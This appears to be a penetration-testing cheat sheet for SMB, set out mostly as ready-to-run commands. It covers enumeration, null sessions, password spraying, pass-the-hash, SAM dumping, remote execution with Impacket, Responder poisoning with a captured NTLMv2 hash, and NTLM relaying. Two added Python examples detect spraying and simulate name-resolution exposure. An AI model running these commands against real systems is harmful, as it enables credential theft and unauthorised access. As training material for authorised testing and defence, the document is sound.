SMB (ports 137, 138, 139, 445)

OS discovery using SMB

nmap --script smb-os-discovery.nse -p445 10.10.10.40

Enumerate Hostnames

nmblookup -A $ip

List Shares

smbmap -H $ip
smbmap -H $ip -u alex -p lol123\!mD
smbclient -N -L \\\\$ip
nmap --script smb-enum-shares -p 139,445 $ip

Null Sessions

Using smbmap

smbmap -H $ip

Using rpcclient (over SMB, port 139 or 445)

rpcclient -U "" -N $ip

Using smbclient

smbclient \\\\$ip\\$sharename                             # null session (note the escaped backslash before the share name)
smbclient \\\\$ip\\$sharename -U username%password        # authenticated

Using crackmapexec

crackmapexec smb 192.168.10.1 -u "" -p ""

Vulnerability checking (or use -sC for the default script set)

nmap --script "smb-vuln*" -p 139,445 $ip   # quote the glob so the shell does not expand it

Scanning

Without username/password

enum4linux -a $ip

With username/password

enum4linux -u 'guest' -p '' -a $ip

Misconfigurations

Anonymous Authentication

Null session (see above); smbmap, smbclient, enum4linux and rpcclient all support it.

Listing File Shares

$ smbclient -N -L //10.129.14.128
$ smbmap -H 10.129.14.128
$ smbmap -H 10.129.14.128 -r notes # -r (recursive) to browse directories

Downloading and Uploading Files

$ smbmap -H 10.129.14.128 --download "notes\note.txt"
$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

RPC Client (enumerate users)

$ rpcclient -U'%' 10.10.110.17

rpcclient $> enumdomusers

user:[mhope] rid:[0x641]


Protocol Specific Attacks

Password Bruteforce and Spray Attacks

$ crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth

--continue-on-success keeps spraying after a valid credential is found (by default the run stops at the first success)

--local-auth authenticates against the local SAM instead of the domain (for a non-domain-joined host or local accounts)
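The detection side of the spray above, as an added example that is not part of the original cheat sheet: a spray shows up as one source failing logons against many distinct accounts in a short window, while classic brute force is many failures against one account. The event tuples, IPs and thresholds below are constructed for the demonstration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample logon events: (timestamp, source_ip, username, success).
# 10.10.110.5 tries one password against many accounts (spray, with one hit);
# 10.10.110.9 hammers a single account (brute force);
# 10.10.110.20 is ordinary activity with a single typo.
SAMPLE_EVENTS = [
    ("2024-01-01 09:00:00", "10.10.110.5", "alice", False),
    ("2024-01-01 09:00:02", "10.10.110.5", "bob", False),
    ("2024-01-01 09:00:04", "10.10.110.5", "carol", False),
    ("2024-01-01 09:00:06", "10.10.110.5", "dave", False),
    ("2024-01-01 09:00:08", "10.10.110.5", "erin", False),
    ("2024-01-01 09:00:10", "10.10.110.5", "mhope", True),
    ("2024-01-01 09:05:00", "10.10.110.9", "administrator", False),
    ("2024-01-01 09:05:01", "10.10.110.9", "administrator", False),
    ("2024-01-01 09:05:02", "10.10.110.9", "administrator", False),
    ("2024-01-01 09:05:03", "10.10.110.9", "administrator", False),
    ("2024-01-01 09:05:04", "10.10.110.9", "administrator", False),
    ("2024-01-01 09:05:05", "10.10.110.9", "administrator", False),
    ("2024-01-01 09:30:00", "10.10.110.20", "alice", False),
    ("2024-01-01 09:30:05", "10.10.110.20", "alice", True),
]


def _by_source(events):
    """Group events per source IP, parsed and sorted by time."""
    grouped = defaultdict(list)
    for ts, src, user, ok in events:
        grouped[src].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), user, ok))
    for src in grouped:
        grouped[src].sort()
    return grouped


def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Sources that fail logons against >= min_users distinct accounts inside `window`.

    Returns {source_ip: (distinct_failed_users, success_seen_in_window)}; the
    success flag tells the responder whether the spray found a valid password.
    """
    findings = {}
    for src, evs in _by_source(events).items():
        for i, (t0, _, _) in enumerate(evs):          # sliding window start
            users, success = set(), False
            for t, user, ok in evs[i:]:
                if t - t0 > window:
                    break
                if ok:
                    success = True
                else:
                    users.add(user)
            if len(users) >= min_users:
                findings[src] = (len(users), success)
                break
    return findings


def detect_bruteforce(events, window=timedelta(minutes=10), min_failures=5):
    """(source_ip, username) pairs with >= min_failures failed logons inside `window`."""
    findings = {}
    for src, evs in _by_source(events).items():
        per_user = defaultdict(list)
        for t, user, ok in evs:
            if not ok:
                per_user[user].append(t)
        for user, times in per_user.items():
            for i, t0 in enumerate(times):
                n = sum(1 for t in times[i:] if t - t0 <= window)
                if n >= min_failures:
                    findings[(src, user)] = n
                    break
    return findings


if __name__ == "__main__":
    print("spray:", detect_spray(SAMPLE_EVENTS))
    print("brute force:", detect_bruteforce(SAMPLE_EVENTS))
```

Both detectors key on failures only, so a quiet spray that happens to succeed on the first try is not caught; the `--continue-on-success` style run above, which keeps going past the hit, is exactly the pattern the sliding window picks up.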

Remote Code Execution

  • Impacket PsExec - Python PsExec-like functionality using RemComSvc.

  • Impacket SMBExec - A similar approach to PsExec without using RemComSvc. This is useful when the target machine does NOT have a writeable share available.

  • Impacket atexec - This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

  • CrackMapExec - includes an implementation of smbexec and atexec.

  • Metasploit PsExec - Ruby PsExec implementation.

Impacket PsExec, SMBExec, and atexec

$ impacket-psexec administrator:'Password123!'@10.10.110.17

CrackMapExec

$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

-x runs a cmd.exe command, -X runs a PowerShell command

Uses --exec-method atexec by default

Extract Hashes from SAM database

$ crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

Enumerating Logged on Users

$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

Pass the Hash

$ crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Forced Authentication Attacks (Responder)

Set up a rogue SMB server to capture NetNTLMv1/v2 hashes

When a user or a system performs Name Resolution (NR), the machine works through a fixed sequence of steps to turn a hostname into an IP address:

  • The IP address of a hostname (for example a file share) is needed.

  • The local hosts file (C:\Windows\System32\Drivers\etc\hosts) is checked for a matching record.

  • If no record is found, the machine consults the local DNS cache, which holds recently resolved names.

  • If there is no cached record, a query is sent to the configured DNS server.

  • If all else fails, the machine issues a multicast query (LLMNR / NBT-NS / mDNS), asking the other machines on the network for the IP address of the file share. This last step is the one a rogue responder answers.
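The resolution order above, simulated as an added example (not part of the original page): it shows which lookups fall through to the multicast step, where a poisoner can answer, and that disabling LLMNR and NBT-NS turns those lookups into plain failures instead. The hosts-file, cache and DNS contents, the DNS suffix and the mistyped share name are constructed.

```python
from typing import Optional, Tuple

# Constructed resolver state for the simulation.
HOSTS_FILE = {"fileserver": "10.10.110.30"}            # C:\Windows\System32\Drivers\etc\hosts
DNS_CACHE = {"dc01.corp.local": "10.10.110.10"}         # recently resolved names
DNS_SERVER = {                                          # what the configured DNS server knows
    "dc01.corp.local": "10.10.110.10",
    "fileserver.corp.local": "10.10.110.30",
}
PRIMARY_SUFFIX = "corp.local"   # appended to single-label names before asking DNS

STAGE_HOSTS, STAGE_CACHE, STAGE_DNS = "hosts", "dns-cache", "dns"
STAGE_MULTICAST, STAGE_UNRESOLVED = "multicast", "unresolved"


def resolve(name: str, llmnr_enabled: bool = True,
            nbtns_enabled: bool = True) -> Tuple[Optional[str], str]:
    """Walk the Windows name-resolution order and report where the lookup ended.

    Returns (ip_or_None, stage). STAGE_MULTICAST means the name was broadcast
    to the LAN (LLMNR/NBT-NS), i.e. any host, including a rogue one, may answer.
    """
    n = name.lower().rstrip(".")
    if n in HOSTS_FILE:                       # 1. hosts file
        return HOSTS_FILE[n], STAGE_HOSTS
    if n in DNS_CACHE:                        # 2. local DNS cache
        return DNS_CACHE[n], STAGE_CACHE
    candidates = [n] if "." in n else [f"{n}.{PRIMARY_SUFFIX}"]
    for fqdn in candidates:                   # 3. configured DNS server
        if fqdn in DNS_SERVER:
            return DNS_SERVER[fqdn], STAGE_DNS
    if llmnr_enabled or nbtns_enabled:        # 4. multicast fallback (poisonable)
        return None, STAGE_MULTICAST
    return None, STAGE_UNRESOLVED             # fallback disabled: fail closed


def exposed_names(names, **flags):
    """Names from `names` that would reach the multicast step under the given flags."""
    return [n for n in names if resolve(n, **flags)[1] == STAGE_MULTICAST]


if __name__ == "__main__":
    lookups = ["fileserver", "dc01.corp.local", "fileserver.corp.local", "mysharefoder"]
    for n in lookups:
        print(f"{n:24s} -> {resolve(n)}")
    print("exposed (defaults):", exposed_names(lookups))
    print("exposed (LLMNR/NBT-NS off):",
          exposed_names(lookups, llmnr_enabled=False, nbtns_enabled=False))
```

The mistyped share name is the interesting case: a name that no legitimate source can resolve is exactly what ends up multicast, which is why a single typo by a user is enough to hand the machine's NetNTLM response to whoever answers first.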

$ sudo responder -I eth0

                                         __               
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|              

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0
               
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
<SNIP>
[+] Listening for events... 

[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Domain Master Browser)
[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Browser Election)
[*] [MDNS] Poisoned answer sent to 10.10.110.17   for name mysharefoder.local
[*] [LLMNR]  Poisoned answer sent to 10.10.110.17 for name mysharefoder
[*] [MDNS] Poisoned answer sent to 10.10.110.17   for name mysharefoder.local
[SMB] NTLMv2-SSP Client   : 10.10.110.17
[SMB] NTLMv2-SSP Username : WIN7BOX\demouser
[SMB] NTLMv2-SSP Hash     : demouser::WIN7BOX:997b18cc61099ba2:3CC46296B0CCFC7A231D918AE1DAE521:XXXXXX

Cracking the NTLM Hash

$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

If the password cannot be cracked, relay the captured authentication instead with impacket-ntlmrelayx or MultiRelay.py

$ grep 'SMB = Off' /etc/responder/Responder.conf   # Responder's own SMB server must be Off so ntlmrelayx can take port 445
$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146   # dumps the SAM database of the relay target

Use -c to run a command on the target instead, for example a PowerShell reverse shell generated at https://www.revshells.com/

For RPC

  • Change a user's password.

  • Create a new domain user.

  • Create a new shared folder.
